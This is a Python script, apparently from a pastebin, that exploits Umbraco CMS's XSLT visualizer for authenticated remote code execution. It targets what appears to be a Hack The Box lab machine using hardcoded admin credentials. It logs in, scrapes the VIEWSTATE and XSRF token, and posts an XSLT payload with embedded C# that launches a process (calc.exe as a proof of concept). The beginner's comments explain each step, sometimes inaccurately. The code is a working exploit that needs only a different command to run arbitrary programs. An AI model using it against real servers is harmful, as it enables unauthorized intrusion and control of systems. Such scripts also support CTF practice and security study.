· 6 years ago · Mar 26, 2020, 09:34 PM
1#Requests is a python module allowing to use the http protocol in a very simple way!
2#He really manages everything!
3#Proxies, cookies, ssl, multipart uploads and many other cool things!
4import requests;
5
6#bs4 precisely BeautifulSoup is very help for data scrapping
7#This data can come from web site and in this way the module request is used to download
8#The data as web page and these datas can be extract, cleaned or sorted and used.
9from bs4 import BeautifulSoup;
10
11def print_dict(dico):
12 """ This function display the values of the dictionary keys given in input"""
13 print(dico.items());
14
15print("Start");
16
17# Execute a calc for the PoC
18
19#payload contain xml document whit specific markup destined to server script
20#This xml page contain an algorithm (a function) who is destined to start a program calc.exe
21#on systen server system
22#The system is windows system I think because .exe is executable file for windows
23#To start this type of file in Linux we must have to install Wine package before.
24#In Linux the process cannot be manipulated like I see on this algorithm so I think that
25#This process is destinated to be execute on Windows.
26#In th end the function return a string
27
28payload = '''
29<?xml version="1.0"?>
30<xsl:stylesheet
31 version="1.0"
32 xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
33 xmlns:msxsl="urn:schemas-microsoft-com:xslt"
34 xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"
35>
36
37<msxsl:script language="C#" implements-prefix="csharp_user">
38 public string xml()
39 {
40 string cmd = "";
41 System.Diagnostics.Process
42 proc = new System.Diagnostics.Process();
43 proc.StartInfo.FileName = "calc.exe";
44 proc.StartInfo.Arguments = cmd;
45 proc.StartInfo.UseShellExecute = false;
46 proc.StartInfo.RedirectStandardOutput = true;
47 proc.Start();
48 string output = proc.StandardOutput.ReadToEnd();
49 return output;
50 }
51 </msxsl:script>
52
53 <xsl:template match="/">
54 <xsl:value-of select="csharp_user:xml()"/>
55 </xsl:template>
56 </xsl:stylesheet> ''';
57
58#Identfiant and paswword (user)
59login = "admin@htb.local";
60password="baconandcheese";
61
62#Host (user)
63host = "http://10.10.10.180";
64
65# Step 1 - Get Main page
66
67#Start a sessin is equivalent to open Your browser
68#s contain all session variable
69s = requests.session()
70
71#Built link to acces to umbroco (subsection? I don't know)
72url_main =host+"/umbraco/";
73
74#Acces to the url_main is equivalent to write the link on broswer and validate it
75r1 = s.get(url_main);
76
77#Get cookie created by web site server and print it on screen
78#As the cookies is return as JSON who is manipulate like python dictionary (hash table)
79#The special function has been create to print on screen only the value of cookie
80#If You want to see the cookie name and associate value You just have to uncomment the next line
81#print(r1.cookies)
82print_dict(r1.cookies);
83
84
85# Step 2 - Process Login
86
87#Now url_login is create to accees to login page of umbroco API
88url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
89
90#Here login info is create and save into python dictionary
91loginfo = {"username":login,"password":password};
92
93#Here the login page is create and login info is place on correspondant field
94#The correspondant file is reconnize by his name <input type = 'text' name = 'username' />
95#The python dictionary can by see as JSON object
96#r2 contain the reponse of server the authentification
97r2 = s.post(url_login, json=loginfo);
98
99# Step 3 - Go to vulnerable web page
100
101#Create url and acces to correspondant page
102url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
103r3 = s.get(url_xslt);
104#r3 contain the response of server
105#r3.text contain the web page as html page (all markup of web page)
106
107#BeautifulSoup is python module for web scraping
108#As r3.text return the server response as html page beautifulSoup explode this page
109#into python dictionary
110soup = BeautifulSoup(r3.text, 'html.parser');
111
112#Find the dictionary's item who id is __VIEWSTATE and return the value contain in his key named 'value'
113#and save it in VIEWSTATE variable
114VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
115
116#Find the dictionary's item who id is __VIEW STATEGENERATOR and return the value contain in his key named 'value'
117#and save it in VIEWSTATEGENERATOR variable
118VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
119
120#Return the value of cookie UMB-XSRF-TOKEN
121#s contain the session variable (see s = requests.Session())
122UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
123
124#Create headers variable as python dictionary who is equivalent to JSON object
125headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
126
127#Create python dictionary whit all data to send to server
128data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
129
130# Step 4 - Launch the attack
131
132#Send data to server and get reponse and save it to r4 print r4 to see server response
133r4 = s.post(url_xslt,data=data,headers=headers);
134
135print("End");